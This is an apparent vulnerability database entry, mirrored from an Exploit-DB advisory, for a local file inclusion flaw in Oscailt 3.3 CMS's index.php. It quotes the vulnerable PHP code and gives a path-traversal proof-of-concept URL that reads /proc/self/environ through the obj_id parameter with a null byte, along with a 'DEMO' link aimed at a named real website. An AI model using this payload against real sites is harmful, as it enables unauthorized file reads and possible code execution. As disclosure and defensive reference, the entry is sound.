Oscailt 3.3 CMS Local File Inclusion Vulnerability

vendor:

Oscailt 3.3 CMS

by:

s4r4d0@yahoo.com

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Oscailt 3.3 CMS

Affected Version From: 3.3

Affected Version To: 3.3

Patch Exists: NO

Related CWE: N/A

CPE: a:oscailt:oscailt:3.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Oscailt 3.3 CMS Local File Inclusion Vulnerability

Oscailt 3.3 CMS is vulnerable to Local File Inclusion vulnerability due to improper sanitization of user input in the index.php file. An attacker can exploit this vulnerability by sending a crafted HTTP request with maliciously crafted obj_id parameter. This can allow an attacker to include arbitrary files from the web server, which can lead to remote code execution. The vulnerable code is located in the index.php file, where the $cachefile variable is used to include a file from the cache directory. The getObjectCacheIndexFile() function is used to construct the path of the file to be included. This function takes the $id parameter and concatenates it with the '.inc' extension, which can be manipulated by an attacker to include arbitrary files from the web server.

Mitigation:

To mitigate this vulnerability, the application should properly sanitize user input and ensure that the input is not used to construct a path to an arbitrary file.

Source

Exploit-DB raw data:

[0] Oscailt 3.3 CMS 
[0] Download: http://sourceforge.net/projects/oscailt/
[0] Bug: Local File Inclusion in index.php file !
[0] Author: s4r4d0@yahoo.com
[0] Team: Fatal Error
[0] Poc: http://www.site.com/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00
[0] DEMO:http://imemc.org/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00
[0] Greetz: Elemento_pcx - z4i0n - m4v3rick - HADES - Hualdo - Derf - DD3str0y3r - Obz !!!
[0] Made in Brazil - SP
[0] Source Code: 
# SecurityReason Note :
#
# The option "Use Friendly URL's" in configuration must be set off
#
# Vulnerable Code in index.php :
#
# $target_indyobject_id = getRequestTargetObjectID();
# ...
# if(!$use_live)
# {
#   $cachefile = getObjectCacheIndexFile($target_indyobject_id);
#   if(file_exists($cachefile))
#   {
#      include_once($cachefile);
#   }
#
# in function getObjectCacheIndexFile() we have ...
#
# function getObjectCacheIndexFile($id)
# {
#   $dir = getObjectCacheDir($id);
#   $f = $id.'.inc';
#   return $dir.$f;
# }
# 
# As we can see , $cachefile try include inc file in cache dir.
#
# magic_quotes = Off // to use %00 null byte
#
# - sp3x
#

[0]Reference: http://securityreason.com/exploitalert/7422